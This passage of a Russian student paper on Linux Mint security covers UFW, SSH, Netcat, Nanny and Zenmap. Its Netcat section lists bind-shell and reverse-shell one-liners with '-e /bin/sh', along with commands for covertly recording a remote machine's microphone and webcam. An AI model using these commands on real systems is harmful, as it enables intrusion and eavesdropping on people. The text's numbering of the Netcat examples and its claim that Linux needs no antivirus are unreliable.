Исследование механизмов безопасности в Linux-подобных ОС

sudo ufw status

Удалить разрешение на подключение к выбранному порту можно так же просто:

sudo ufw delete allow 80/tcp

Запрещающее правило создается аналогично разрешающему, только вместо allow используется deny:

sudo ufw deny 53

Теперь был блокирован доступ к 53-му порту. При этом если ранее было создано, например, разрешающее правило, которое теперь нужно заменить на блокирующее, то это лучше производить в два этапа. Вначале отключается первое правило, а затем устанавливается второе.

Вместо номера порта можно назвать сервис по имени. Необходимо узнать как называется нужный сервис:

cat /etc/services | less

и включить его в правило:

sudo ufw allow ssh

В правилах UFW можно задавать IP-адреса (источника и назначения). Например, чтобы разрешить подключение с внутренней сети 192.168.1.0/24, используется:

sudo ufw allow 192.168.1.0/24

или запрещающее правило:

sudo ufw deny from 10.20.30.40

Опционально можно указать порт и протокол. Для того чтобы разрешить подключение по SSH только с одного IP-адреса следует ввести следующую команду:

sudo ufw allow from 192.168.0.20 to any port 22

Для включения/отключения регистрации используется команда logging.

sudo ufw logging on



Файл /etc/ufw/sysctl.conf задает некоторые системные переменные (аналог общесистемного /etc/sysctl.conf). Например, чтобы разрешить перенаправление пакетов, снимается комментарий со строки

net/ipv4/ip_forward=1

В состав Linux Mint включен и графический интерфейс UFW - GUFW

Рисунок 3.1 - GUFW

Для запуска GUFW используется команда:

sudo gufw

Первым делом следует изменить статус работы фаервола на «Включен». Но следует учесть: на дефолтных настройках входящая информация из интернета запрещена, а исходящая проверяется. Таким образом, весь трафик станет напоминать улицу с односторонним движением.

Также можно создать развернутые правила, например, для специфических задач. Следует обратить внимание на первую из трех вкладок «Правила». В ней задаются правила всестороннего интернет движения для приложений вроде torrent и Skype. К сожалению, не все трудности преодолеваются путем фиксации распоряжений для списка предустановленных приложений. Помимо вышеупомянутого, можно оставить ценные целевые указания целому списку хостов и IP адресов, а также направлений соединений.

Если после всех путешествий по настройкам безопасности системы через фаервол, можно сделать вывод, что все возможное уже сделано, останется последний сервисный штрих - прописать UFW в автозагрузку. Нужно запустить в терминале команду:

sudo update-rc.d ufw defaults

3.2 Удаленное управление

Потребность в удаленном управлении возникла с момента появления сети и систем, которые необходимо было администрировать на расстоянии.

Существует несколько очень распространенных протоколов удаленного администрирования, позволяющих управлять системой посредством сети. Самым старым и самым распространенным, но в то же время самым небезопасным, является протокол Telnet. Это самый первый протокол удаленного взаимодействия, появившийся на заре развития вычислительных сетей, когда проблеме безопасности при передаче информации не уделялось практически никакого внимания. При передаче информации по протоколу Telnet все данные передаются в открытом незашифрованном виде, в том числе имена и пароли пользователей. Любой, даже малоопытный в компьютерных делах, пользователь, имея программу под общим названием network sniffer (с англ. «сетевой анализатор пакетов»), может получить имя и пароль при передаче их по сети.

Помимо протокола Telnet в UNIX-системах существует целое семейство так называемых r-программ. К ним относятся rsh, rlogin (начальная буква r трактуется как remote) и другие, позволяющие производить различные операции, связанные с удаленным администрированием. Однако уровень безопасности при использовании r-программ, как и уровень безопасности при использовании Telnet, также оставляет желать лучшего.

Существует еще один протокол для управления некоторыми параметрами системы и получения информации о ней. Это протокол SNMP (Simple Network Management Protocol). Протокол SNMP имеет ограниченный спектр возможностей и не лишен тех же недостатков в плане безопасности, что и протокол Telnet.

Эти протоколы могут служить хорошим решением для таких локальных сетей, где требования, предъявляемые к безопасности, являются не очень высокими. Однако, при передаче данных по такой сети, как Интернет, где пакет, прежде чем достичь адресата, проходит несколько небезопасных узлов, их использование может служить потенциальной угрозой безопасности и основной причиной успешного проникновения в систему.

На сегодняшний день одним из самых распространенных и безопасных протоколов удаленного администрирования, использующих шифрование при передаче данных, является протокол SSH (Secure SHell). В протоколе SSH для организации безопасного доступа применяется процедура аутентификации с использованием асимметричного шифрования с открытым ключом. Это обеспечивает более высокую безопасность, чем при использовании симметричного шифрования, хотя и порождает дополнительную вычислительную нагрузку. При последующем обмене данными применяется уже симметричное шифрование, более экономичное в смысле затрат процессорного времени. Также SSH поддерживает возможность работы с уже упомянутым протоколом Telnet, безопасную работу по протоколу графического уровня X11, благодаря возможности перенаправления соответствующих данных по надежным SSH-каналам, предоставляет безопасную замену многим r-программам UNIX, с которыми традиционно связаны проблемы обеспечения безопасности.

3.3 Netcat

Netcat - это сетевой инструмент, замену которому вряд ли можно найти. Обладая предельной простотой, он невероятно богат на функционал, а диапазон его применения столь широк, что в народе netcat окрестили «Швейцарским армейским ножом».

Утилита netcat по сути не делает ничего, кроме копирования данных в сетевой порт и из него, но при этом с ее помощью можно:

1. Передавать файлы (первую команду выполняем на принимающей машине, вторую - на передающей:

nc -l 31334 > filename nc 172.16.69.143 31334 < filename

2. Удаленно читать логи (первая - сервер, вторая - клиент):

nc -f /var/log/messages | nc -l 31334 nc 172.16.69.143 31334

3. Использовать вместо telnet (первая - telnet-сервер, вторая - клиент):

nc -l -p 31334 -e /bin/sh nc 172.16.69.143 31334

4. Сканировать на открытые порты:

nc -z execbit.ru 1-1024

5. Осуществлять фингерпринт сервисов на основе баннеров:

echo "QUIT" | nc execbit.ru 1-1024

6. Организовывать обратный шелл (первая - клиент, вторая - сервер, однако шелл откроется от сервера к клиенту):

nc -e /bin/sh 172.16.69.143 31334 nc -l -p 31334

7. Делать микрофонную запись с удаленной машины (сервер, клиент):

arecord -f dat -t raw | nc -l 31337 nc 172.16.69.143 31337 | oggenc - -r -o nc.ogg

8. Получать снимки с web-камеры удаленной машины (сервер, клиент):

while [ 1 ]; do streamer -o /tmp/photo.jpeg; nc -l 31337 < /tmp/photo.jpeg; done nc localhost 31337 > photo.jpeg

Однако важно понимать, что существует несколько версий Netcat, поведение которых может отличаться. Экземпляр, поставляемый с дистрибутивами Linux, - это оригинал, доживший до наших дней. Все пять приведенных примеров он отработает без проблем. Версия под названием GNU Netcat не поддерживает опции -e, поэтому второй и пятый примеры она не воспримет.

Особого внимания заслуживает Netcat, распространяемый вместе с BSD-системами, опция -e в нем есть, но предназначена она для шифрования входящего и исходящего трафика методом IPSec ESP:

nc -e 'in ipsec esp/transport//require' -e 'out ipsec esp/transport//require' \172.16.69.143 31334



Кроме того, BSD Netcat способен подключаться к удаленной машине через прокси:

nc -x172.16.64.1:8080 -Xconnect 172.16.69.143 31334

В этом примере прокси находится по адресу 172.16.64.1:8080, а флаг -Xconnect говорит о том, что он работает с протоколом HTTP. Также поддерживаются SOCKS версий 4 и 5, но о них следует информировать netcat через флаг -X4 или -X5.

Сам Netcat легко использовать в качестве прокси или редиректора портов, но в этом случае его лучше связать с демоном inetd:

echo 'redirect-2525-to-25 2525/tcp' >> /etc/services echo 'redirect-2525-to-25 stream tcp nowait nobody /usr/bin/nc nc -w 2 127.0.0.1 25' \ >> /etc/inetd.conf

killall -HUP inetd

Теперь весь трафик, пришедший на порт 2525, будет перенаправляться на стандартный 25-й SMTP-порт. Таким же образом мы можем завернуть трафик с любого порта на другой порт/машину, просто видоизменив первые две команды.

Кстати, пользователи дистрибутивов Linux могут вообще не заморачиваться с Netcat: ведь демон xinetd, ставший стандартом в Linux-системах, сам умеет перенаправлять сетевой трафик.

3.4 Программное средство контроля

Чаще всего в этом сегменте используются возможности антивирусов. Их linux-версии, как правило, лишены таких модулей, поэтому не способствуют решению проблемы. Если на чем-то стоит акцентировать внимание, то подойдут специальные программы, такие как Nanny.

По сути, программа объединяет в себе стандартный механизм формирования правил работы за компьютером для ребенка. Они касаются не только использования интернета, но и общего времени пребывания. Предоставлена возможность составлять расписание по дням недели. Указывать конкретные часы для каждого из них. Все это повышает эффективность планирования досуга. При разумном подходе есть все шансы максимально сбалансировать нагрузку.

Рисунок 3.2 - Консоль администратора Nanny

Приложение устанавливается из собственного репозитория.

1. sudo add-apt-repository ppa:boamaod/nanny-test

2. sudo apt-get update

3. sudo apt-get install nanny

Для первого запуска и настройки нужно подтверждения root-прав. Основное окно разделено на 2 части. В первой находятся пользователи, во второй расположены инструменты управления активностью для каждого из них.

3.5 Аудит сети при помощи Zenmap

В обязанности сетевого администратора входит множество вещей и аудит сети - одна из основных. Аудит сети не является чем-то трудным, если её размер небольшой. Но что делать, если размер администрируемой сети делает невозможным обход «вручную» каждого устройства или хоста для того, чтобы выяснить работает он или нет, какая ОС на нём установлена, какие порты открыты, а какие нет? Если администратор оказался в такой ситуации, то ему очень поможет программа, ставшая фактически стандартом в мире OpenSource утилит аудита сетей - Zenmap.

Zenmap является графической оболочкой для популярной утилиты Nmap. Nmap - это консольный OpenSouce инструмент для анализа безопасности и аудита сети. Несмотря на то, что Nmap сам по себе является очень мощной утилитой, при работе в больших сетях многие администраторы не имеют особого желания пользоваться одними консольными инструментами. Как говорят некоторые из них: «Картинка стоит тысячи слов». И в случае с Zenmap они безусловно правы, поскольку при помощи него вы можете получить интерактивную графическую карту вашей сети.

Запуск Zenmap лучше всего выполнять из-под root, поскольку для полнофункциональной работы Nmap требуются права суперпользователя:

sudo zenmap

Запустив Zenmap, можно увидеть, довольно простой пользовательский интерфейс:

Рисунок 3.3 - Zenmap



Первое, что понадобится - это цель (target) сканирования. Допустим, необходимо просканировать сеть с IP-адресами по маске 192.168.100.*. В поле Target вводится этот шаблон. Далее, необходимо в выпадающем списке Profile выбрать подходящий профиль сканирования из предложенных. После выбора подходящего профиля изменится и содержимое поля «Command», которое содержит в себе команду nmap с параметрами. В случае необходимости можно подкорректировать её «под себя».

После того, как цель определена и выбран профиль сканирования, можно нажать «Scan». После того, как сканирование будет завершено, в левой панели можно будет увидеть список найденных хостов. В правой же панели показано пять закладок:

· Nmap Output: закладка, открывающаяся по умолчанию, в которой видно текстовый вывод работы nmap;

· Ports/Hosts: здесь видно какие порты открыты и на каких хостах;

· Topology: на этой закладке отображается топология вашей сети в графическом виде;

· Host Details: здесь можно увидеть подробную информацию о результатах сканирования хоста, выбранного в левой панели;

· Scans: в этой закладке собраны все ваши предыдущие команды сканирования.

В закладке Topology, находиться самая интересная часть Zenmap. Здесь отображается топология исследуемой сети в виде скопления кружков с именами хостов или их IP-адресами. Если исследуемая сеть достаточно большая, то разобрать в этой куче кружков практически ничего невозможно.



Рисунок 3.4 - Топология

Как говорилось выше, графическая топология, представленная в Zenmap, является интерактивной. При помощи клика по хосту можно сделать его центральной частью карты, а в разделе Navigation можно вращать всю карту целиком, как вам захочется. Эти функции особенно удобны в случае, когда размеры вашей сети достаточно большие и вам необходимо работать с какой-то отдельной частью топологии. Чтобы получить подробную информацию о каком-либо хосте, достаточно кликнуть правой кнопкой по нему.

Zenmap - невероятно мощная утилита, предоставляющая возможность сетевым администраторам выполнять аудит сетей практически любого размера. Отличная вещь, простая в использовании и вдобавок - OpenSource. Обязательно покопайтесь в редакторе профилей, и настройте всё наилучшим для себя образом, и тогда вы в полной мере сможете оценить всю мощь этого инструмента.



4. ОТЛИЧИЯ MINT ОТ UBUNTU

Изначально Mint был основан на Ubuntu, но на данный момент разница между ними существенная. Оба дистрибутива разработаны таким образом, чтобы максимально упростить жизнь пользователей, но в каждом из случаев был выбран свой уникальный подход.

Оба дистрибутива обладают уникальными оболочками. Если провести параллели с другими операционными системами, то Ubuntu имеет много общего с OS X, в свою очередь дистрибутив Mint подобен Windows.

«Unity» - небезызвестная причина существенного (хотя и не критического) сокращения пользовательской базы Ubuntu. Причём, люди бежали на Linux Mint не столько из-за непривычности новомодной среды, сколько из-за её нестабильности, сырости, недоделанности. До ума довели лишь в релизе 12.04.3 в конце лета 2013-го.

Слишком мелкие пункты меню, интегрирующегося с верхней панелью вместо пребывания в окне приложения. Особенно в сравнении с кнопками на Launcher. Значки приложений большие, целиться удобно. И, что тоже хорошо, прокручиваются сами при наведении, лишних кликов не требуется. Но настройка ширины верхней, как в Xubuntu, например, почему-то не предусмотрена. Какие тонкие пальцы нужны, чтобы попадать по крошечным пунктам этого встраиваемого меню на маленьком сенсорном дисплее?

Рисунок 4.1 - Unity

«Cinnamon» - обладает меню похожим на «Пуск» в Windows, запустить которое можно с панели задач. Поиск приложений в этом случае гораздо проще.

Рисунок 4.2 - Cinnamon

Обе оболочки обладают как определенным удобством, так и теми нюансами, которые могут замедлить работу начинающего пользователя. С Ubuntu все просто и понятно до тех пор, пока пользователь не доберется к Главному меню (Dash). В свою очередь меню Mint выглядит гораздо более дружелюбно. В любом случае вы всегда сможете найти искомые файл или приложение, главное знать, что искать.

Хоть Ubuntu теперь работает быстрее, чем несколько версий назад, но Linux Mint не собирается уступать первенство. Этот дистрибутив всегда отличался скоростью даже на маломощном железе (как минимум по сравнению с Ubuntu). Если пользователь желает получить от старого компьютера большую скорость и лучшую производительность, то для этих целей лучше выбрать Mint.

Linux прекрасен тем, что полностью открыт для изменений. ОС позволяет настроить каждый сантиметр на компьютере, начиная от ярлыков и заканчивая работой окон. В случае с Ubuntu это осталось в прошлом. Дистрибутив не очень гибкий, особенно в сравнении с Mint.

Преимущество Linux Mint - в привычной рабочей среде, в традиционности интерфейса, главным образом. Причём, и Cinnamon, и особенно MATE более шустрые и легковесные, нежели KDE, где интерфейс ничуть не менее традиционен.

Всё остальное в «Мяте» весьма часто бывает слепленным воедино, к сожалению, гораздо более криво, нежели в Ubuntu.

Еще пару лет назад Ubuntu был самым популярным дистрибутивом, но после перехода на Unity, пользователей поубавилось в пользу Linux Mint. По версии Distrowatch в топе 10 самых популярных дистрибутивов Linux Mint уже второй год подряд занимает первое место.



ВЫВОДЫ

Будучи свободным, Linux завоевал огромное количество пользователей. Потому что он доступен. В одном дистрибутиве Linux тысячи программ для построения любой системы - как домашней, так и серверной. Они продаются немногим дороже стоимости носителя или их можно свободно скачать в Интернете. Даже пиратские диски с таким же количеством коммерческих программ обойдутся дороже.

Создание любого числа копий с одного дистрибутива совершенно правомерно. Отсюда выгода для крупных предприятий: не нужно приобретать лицензию на ПО на каждое рабочее место, все расходы фактически сводятся к расходам на обслуживание (администрирование).

Открытый исходный текст даёт возможность любому пользователю и специалисту обнаружить ошибку и исправить её. Чем больше пользователей у открытой программы и чем дольше она используется, тем надёжнее и стабильнее становится работа системы. Linux и системообразующие утилиты к нему много лет используются миллионами специалистов.

Прозрачность. В Linux полностью видны все внутренности: все компоненты системы и их взаимодействие не только доступны для изучения, но и подробно и полно задокументированы. Это значит, что разобраться в причинах любой возникшей проблемы может не только уже готовый специалист по Linux, но любой, кто внимательно прочтёт документацию и проанализирует ситуацию. Поэтому ответы на 99% вопросов по Linux тут же обнаруживаются в Интернете. Остальные вопросы можно задать прямо разработчикам - и они будут рады ответить (это ведь их детище, и они хотят его улучшить). Так и становятся специалистами по Linux.

Гибкость. Распространено мнение, что Linux - очень сложный: обязательно нужно осваивать командную строку и учить программирование. Это не так: Linux - какой угодно. Он может выглядеть как Windows, как MacOS, как что-то совсем своеобразное. Изменить можно всё, потому любые уровни интерфейса открыты и доступны для изменения.

Вообще то слово, которое определяет особенности системы - это устойчивость, и этим она особенно хороша. Она позволяет решать множество различных задач наиболее эффективными и рациональными методами, позволяя при этом экономить время и средства. Для работы с ней не нужно использовать антивирусы, она сама по себе очень надежна. Система отражает как возможные атаки извне, так и вредоносные вирусы. Это только некоторые преимущества Linux, на самом деле их намного больше. Но чтобы о них узнать, Linux нужно установить и освоить.



СПИСОК ИСТОЧНИКОВ

1. Linux Mint на 100 %. Сергей Яремчук, Издательство «Питер», Санкт-Петербург, 2011 год.

2. Интернет-источник http://mintlinux.ru

3. Интернет-источник http://prostolinux.ru

4. Интернет-источник http://shkola-linux.ru

5. Интернет-источник http://moylinux.ru

6. Интернет-источник linuxmint.com

7. Интернет-источник http://mintgeek.ru

Размещено на Allbest.ru

...